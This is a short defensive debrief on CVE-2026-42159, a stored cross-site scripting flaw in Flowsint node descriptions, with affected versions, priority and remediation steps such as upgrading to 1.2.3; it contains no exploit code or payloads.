CVE-2026-42159 reconurge CVE debrief

Who should care

Flowsint administrators, security teams, and analysts who create, share, or review investigations and sketches should treat this as relevant, especially in collaborative or multi-user environments where untrusted content can be introduced into node descriptions.

Technical summary

The vulnerable behavior is in node rendering: descriptions can include attacker-controlled HTML, and selecting the node causes that content to be rendered in the UI. The result is a stored XSS condition (CWE-79) with network attack vector and required user interaction. NVD lists Flowsint versions before 1.2.3 as affected; the vendor advisory identifies the fix in 1.2.3.

Defensive priority

Medium priority. Patch before further use of affected versions, especially if Flowsint is exposed to multiple users or accepts imported, shared, or externally sourced investigation content.

Recommended defensive actions

• Upgrade Flowsint to version 1.2.3 or later.
• Review any workflows that allow untrusted users or imported data to populate node descriptions.
• Treat existing investigation content as potentially tainted until validated and sanitized.
• If upgrading is delayed, restrict access to affected instances and limit who can create or edit sketches.
• Use the linked vendor advisory and NVD record to verify remediation status and affected versions.

Evidence notes

The CVE record was published on 2026-05-14 and last modified on 2026-05-21. NVD marks the vulnerability status as Analyzed and lists Flowsint versions before 1.2.3 as vulnerable. The advisory reference on GitHub is the primary vendor-linked source and identifies CWE-79. The provided CVSS v4.0 vector reflects network-reachable impact with user interaction required.

Official resources